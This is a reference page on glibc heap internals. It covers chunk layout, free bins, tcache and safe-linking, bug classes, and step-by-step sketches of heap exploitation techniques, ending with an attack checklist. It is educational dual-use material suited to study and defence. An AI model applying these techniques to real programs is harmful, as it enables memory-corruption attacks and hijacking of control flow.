Heap Internals & Exploitation
Deep reference on glibc ptmalloc2: chunk layout, free bins, tcache, safe-linking, UAF, double-free, heap overflow, and modern exploitation techniques.
The heap is the primary arena for dynamic memory in C and C++ programs. Most exploitation techniques at the heap layer abuse the allocator's unconditional trust of its own metadata — a trust you can violate through out-of-bounds writes, use-after-free, or double-free bugs.
These notes focus on glibc ptmalloc2, the allocator on most Linux systems. Concepts carry over to jemalloc and tcmalloc with varying details.
Quick Reference
1. Chunk Anatomy
![]()
Every malloc call returns a pointer into the user region of a chunk. Directly before that pointer sits the chunk header managed — and trusted — by the allocator.
In-use chunk layout
(end of previous chunk's user data)
┌─────────────────────────────────────┐
│ prev_size (8 B) │ ← reused as user data when prev is in-use
│ size | flags (8 B) │ ← size of THIS chunk; 3 flags in low bits
├─────────────────────────────────────┤ ← malloc() returns pointer HERE ↓
│ │
│ user data (size − 16 B) │
│ │
└─────────────────────────────────────┘
(next chunk's prev_size starts here)
Free chunk — additional fields
┌─────────────────────────────────────┐
│ prev_size (8 B) │
│ size | flags (8 B) │
├─────────────────────────────────────┤
│ fd → next free chunk │
│ bk → prev free chunk │
│ fd_nextsize (large bin only) │
│ bk_nextsize (large bin only) │
└─────────────────────────────────────┘
Size flags (low 3 bits of size)
size field sits immediately before user data, even a one-byte overflow (e.g., writing a null terminator past a string buffer) can flip the PREV_INUSE bit of the next chunk, tricking the allocator into a dangerous backward consolidation.2. Free Bins
After free(p), glibc places the chunk into one of five bin structures — checked in order during the next malloc:
- Per-thread, no lock
- 64 bins for sizes 24–1032 B (16-B steps)
- Max 7 entries per bin (count enforced)
- Singly linked — only
fd - Checked first on both alloc and free
- Sizes ≤ 64 B (default); up to 80 B
- 10 singly-linked LIFO bins
- No coalescing (speed trade-off)
- Consolidated only on
malloc_consolidate()
- Single circular doubly-linked list
- First stop for non-fast freed chunks
- Chunks sorted into small/large on the next malloc scan
- 62 bins, sizes 16–504 B
- Doubly-linked FIFO (exact-size match)
- Chunks coalesce with neighbours on free
- 63 bins for sizes ≥ 512 B
- Doubly linked + size-sorted (best-fit)
- Extra
fd_nextsize / bk_nextsizeskip-list chains
- Last resort — extend heap via
sbrk/mmap - Always at the high end of the arena
- No prior free chunk to coalesce backwards with
malloc lookup order
malloc(n):
1. tcache[size_class] → O(1) thread-local pop (≥ 2.26)
2. fastbin[size_class] → O(1) if size ≤ fast threshold
3. small bin[size_class] → exact fit, doubly-linked pop
4. unsorted bin → linear scan; splits oversized chunks
5. large bin → best-fit in a size-sorted list
6. top chunk → carve from wilderness, or sbrk/mmap
3. Tcache Deep Dive (glibc ≥ 2.26)
Tcache is a per-thread, lock-free singly-linked cache that makes small allocations near-free in latency. Its initial design lacked almost all integrity checks — making it the dominant exploitation target for several years.
Internal structures
typedef struct tcache_entry {
struct tcache_entry *next; /* singly linked */
struct tcache_perthread_struct *key; /* 2.29+: double-free canary */
} tcache_entry;
typedef struct tcache_perthread_struct {
uint16_t counts[TCACHE_MAX_BINS]; /* entries per bin (max 7) */
tcache_entry *entries[TCACHE_MAX_BINS]; /* head of each bin */
} tcache_perthread_struct;The tcache_perthread_struct itself lives at the very start of the heap, allocated by malloc during thread initialisation. Corrupting it gives complete control over all future small allocations.
put / get (simplified)
static void tcache_put(mchunkptr chunk, size_t tc_idx) {
tcache_entry *e = chunk2mem(chunk);
e->key = tcache; /* 2.29+: tag for double-free check */
e->next = PROTECT_PTR(&e->next, /* 2.32+: safe-linking */
tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
static void *tcache_get(size_t tc_idx) {
tcache_entry *e = tcache->entries[tc_idx];
tcache->entries[tc_idx] = REVEAL_PTR(e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *)e;
}Safe-linking (glibc ≥ 2.32)
The next pointer stored in tcache (and fastbin) entries is XOR-mangled with a secret derived from its own storage address:
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr))((((size_t)(pos)) >> 12) ^ ((size_t)(ptr))))
#define REVEAL_PTR(ptr) PROTECT_PTR(&ptr, ptr)The slot address pos is right-shifted 12 bits (drops the page-offset) then XOR-ed with the pointer value. Forging a valid mangled pointer requires knowing the heap address of the slot — which demands a prior heap leak.
next field of a freed chunk through a dangling pointer or OOB read — this leaks a mangled pointer. XOR it with slot_addr >> 12 to recover the raw heap address, then compute the correct mangled value for your forged pointer.4. Allocator Mitigations
tcache_entry.key is set to the tcache header pointer on free; if the same pattern is seen on re-entry, abort() is called.next pointers are XOR'd with a slot-derived secret. Forging a pointer requires a heap address leak.tcache->counts[i] is incremented on put and decremented on get. Underflow or overflow triggers abort.tcache_get the returned pointer must be MIN_CHUNK_SIZE-aligned. Misalignment aborts.fd->bk == chunk and bk->fd == chunk before relinking. Classic write-what-where now aborts unless you control both pointers.5. Bug Classes
Uninitialized use
Reading fields of a freshly malloc'd object before writing them. Heap memory is not zeroed by malloc.
typedef struct { int len; char *buf; } Msg;
Msg *m = malloc(sizeof *m);
printf("%d\n", m->len); // UB: reading stale bytes from a prior allocationcalloc or explicit memset when zero-initialization matters.Unchecked malloc return
char *p = malloc(n);
memcpy(p, src, n); // segfault — or null-pointer write — if p == NULLOn modern Linux, mmap_min_addr prevents null-page mapping in userspace, so null-deref is typically a crash. In the kernel or embedded contexts it may be exploitable.
Use-after-free (UAF)
![]()
char *a = malloc(16);
free(a);
a[2] = 0x41; // UAF write — 'a' is now on the tcache free listTimeline:
t0 malloc(16) → 0xADDR allocate
t1 use(0xADDR)
t2 free(0xADDR) chunk goes to tcache/fastbin
t3 malloc(16) → 0xADDR SAME region returned to a second caller
t4 a[2] = 0x41 clobbers the second caller's object
Stack variant — use-after-return:
char *bad(void) {
char local[16];
return local; // pointer to a stack frame that no longer exists
}Type confusion — free object of type A, reallocate as type B at the same address, use A's dangling pointer to reach B's fields.
Pointer hijack — if the freed object contained a function pointer or vtable, overwrite it via the dangling pointer.
Metadata leak — freed chunk's fd/bk now hold heap (or libc) addresses; read them through the dangling pointer for a leak.
Double free
![]()
free(p);
if (error_condition)
free(p); // double free — corrupts tcache / fastbin listIn tcache before glibc 2.29 (no key check), this directly creates a cycle:
tcache bin (size class): p → p → p → … (self-referential)
malloc(sz) → p (pop first entry)
malloc(sz) → p (same address again — two owners of one allocation)
NULL — free(NULL) is defined as a no-op. Adopt clear ownership semantics so exactly one code path frees each allocation.Memory leak
for (int i = 0; i < N; i++) {
char *buf = malloc(1 << 20); // 1 MiB
process(buf);
/* forgot: free(buf) */
}
// RSS grows unbounded; heap becomes fragmentedLeaks rarely cause direct exploitability but degrade availability (OOM) and may let an attacker indirectly shape heap layout for later exploitation.
Heap overflow
![]()
Non-exploitable layout — overflow lands in the top chunk:
char *buf = malloc(1024);
strcpy(buf, argv[1]); // overflow goes into wilderness; no free-list corruption![]()
Exploitable layout — two adjacent allocations:
char *buf = malloc(1024);
char *buf2 = malloc(1024); // typically placed immediately after buf
strcpy(buf, argv[1]); // overflow lands on buf2's chunk header
free(buf2); // allocator consults the corrupted headerWhat even a single-byte overflow can achieve:
- Flip
PREV_INUSE→ trigger false backward consolidation - Overwrite
size→ misalign future allocations - Plant fake
fd/bk→ write-what-where on unlink (older glibc)
6. Exploitation Techniques
Classic Unlink / Frontlink
Precondition: Heap overflow into a free chunk's fd/bk fields.
Forge Y.fd = &WRITEVAL
Forge Y.bk = &TARGET − 0x10 (so bk→fd lands on TARGET)
unlink(Y):
fd→bk = bk → *(TARGET) = WRITEVAL ← arbitrary write
bk→fd = fd → *(WRITEVAL+8) = &TARGET-8
A write-what-where primitive. Patched in glibc 2.3.4 with the consistency check fd→bk == chunk && bk→fd == chunk.
P that holds the address of the fake chunk, set fd = P − 0x18, bk = P − 0x10. Then fd→bk and bk→fd both resolve to the fake chunk, passing the check.Fastbin Corruption
Precondition: UAF or double-free on a fastbin-sized chunk.
Step 1 free(A) → fastbin: [ A → NULL ]
Step 2 free(A) again → fastbin: [ A → A ] (old glibc: only checks top-of-bin ≠ A)
Step 3 malloc(sz) → returns A; write A.fd = FAKE − 8
Step 4 malloc(sz) → returns A again (drain)
Step 5 malloc(sz) → returns FAKE (allocator treats FAKE as a valid chunk)
Use step 5 to write into FAKE — typically __malloc_hook, __free_hook, or a GOT entry.
Tcache Dup / Poisoning
Before glibc 2.32 (no safe-linking):
free(A) → tcache: [ A ]
free(A) → tcache: [ A → A ]
malloc(sz) → A write A->next = &TARGET
malloc(sz) → A (drain the duplicate)
malloc(sz) → TARGET allocator hands us the target address as "fresh" memory
With safe-linking (≥ 2.32), step 3 requires a mangled pointer:
size_t slot = (size_t)&A->next;
A->next = (tcache_entry *)((slot >> 12) ^ (size_t)&TARGET);Which requires &A->next — obtained from a heap address leak.
House of Force (pre-glibc 2.29)
Precondition: Overflow into the top chunk's size field.
1. Overwrite top->size = 0xffffffffffffffff
2. malloc(req) where req wraps 64-bit arithmetic to place the new
top pointer at TARGET − 2*sizeof(size_t)
3. The following malloc(any) returns TARGET — arbitrary allocation
Mitigated in glibc 2.29: top chunk size is sanity-checked against arena bounds.
House of Einherjar
Precondition: Off-by-one null-byte overflow into the low byte of the next chunk's size (clearing PREV_INUSE) and the ability to forge a fake free chunk somewhere in memory.
1. Plant fake chunk header at address FAKE
2. Off-by-one: clear PREV_INUSE of next chunk; set its prev_size = distance to FAKE
3. free(next chunk) → backward consolidate lands at FAKE
4. malloc(N) → returns chunk overlapping FAKE + live adjacent object
(overlap gives read/write over the adjacent object)
Heap Spray
Allocate many same-size objects to deterministically fill bins and predict heap layout:
void *spray[256];
for (int i = 0; i < 256; i++)
spray[i] = malloc(sz); // fill tcache + fastbins
for (int i = 0; i < 256; i++)
free(spray[i]); // drain — next alloc is at a known addressTurns a probabilistic exploit into a reliable one. Essential when ASLR is active.
7. Tooling
valgrind --leak-check=full ./bin-fsanitize=address,undefined -gheap / bins / vis_heap_chunksmalloc_stats(); /* writes to stderr */LD_PRELOAD=libdislocator.so ./binpwndbg> heapinfoEssential pwndbg commands
heap walk all chunks in the main arena
bins show fastbins, unsorted, small, large bins
tcachebins dump per-thread tcache entries + counts
vis_heap_chunks N color-coded visual map of N chunks
find_fake_fast ADDR find memory that looks like a valid fastbin chunk
malloc_chunk ADDR parse chunk header at ADDR
try_free ADDR simulate a free() call to check what glibc would do
Attack Checklist
- Identify the primitive — overflow / UAF / double-free / type confusion
- Leak addresses — read a freed chunk's fd/bk (unsorted bin → libc leak) or a tcache pointer (heap leak)
- Shape the heap — spray/drain to control chunk adjacency and bin state
- Corrupt a free-list pointer — redirect the next allocation to a target region (GOT, hook, vtable)
- Write your payload — overwrite
__free_hook,__malloc_hook, a GOT entry, or a C++ vtable pointer - Trigger — call the overwritten hook/function to gain control flow